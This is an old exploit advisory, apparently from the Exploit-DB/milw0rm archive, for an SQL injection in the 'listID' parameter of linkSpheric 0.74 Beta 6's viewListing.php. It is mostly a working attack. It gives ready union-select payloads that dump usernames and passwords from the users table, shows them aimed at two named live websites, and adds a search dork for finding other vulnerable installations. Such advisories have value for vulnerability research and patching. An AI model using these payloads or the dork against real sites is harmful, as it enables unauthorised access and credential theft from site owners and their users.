linkSpheric 0.74b6 - 'listID' SQL Injection

EDB-ID:

9316


Author:

NoGe

Type:

webapps


Platform:

PHP

Date:

2009-07-30


===============================================================================================


  [o] linkSpheric 0.74 Beta 6 SQL Inejction Vulnerability

       Software : linkSpheric version 0.74 Beta 6
       Vendor   : http://dataspheric.com/
       Download : http://sourceforge.net/projects/linkspheric/
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com


===============================================================================================


  [o] Vulnerable file

        viewListing.php



  [o] Exploit

       http://localhost/[path]/viewListing.php?listID=[SQL]



  [o] Proof of concept

       http://dataspheric.com/directory/viewListing.php?listID=-52+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,group_concat(userName,0x3a,password),21,22,23,24,25,26,27,28+from+users--
       http://pcmsite.net/links/viewListing.php?listID=-5+union+select+1,2,3,4,5,6,7,8,group_concat(userName,0x3a,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+users--



  [o] Dork

       "Powered by linkSpheric"


===============================================================================================


  [o] Greetz

       MainHack BrotherHood [ http://mainhack.net ]
       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang
       H312Y yooogy mousekill }^-^{ loqsa zxvf martfella
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke

        
===============================================================================================

# milw0rm.com [2009-07-30]